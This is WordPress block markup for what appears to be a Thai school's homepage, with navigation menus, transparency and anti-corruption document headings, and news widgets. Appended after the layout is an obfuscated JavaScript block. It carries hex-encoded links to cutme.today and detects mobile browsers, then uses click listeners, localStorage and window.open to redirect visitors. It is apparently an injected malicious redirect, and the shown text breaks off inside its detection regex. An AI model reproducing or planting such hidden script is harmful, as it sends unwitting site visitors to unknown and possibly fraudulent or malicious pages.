-->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreBgColor\":\"#0a71ad\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreBgColor\":\"#0a71ad\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 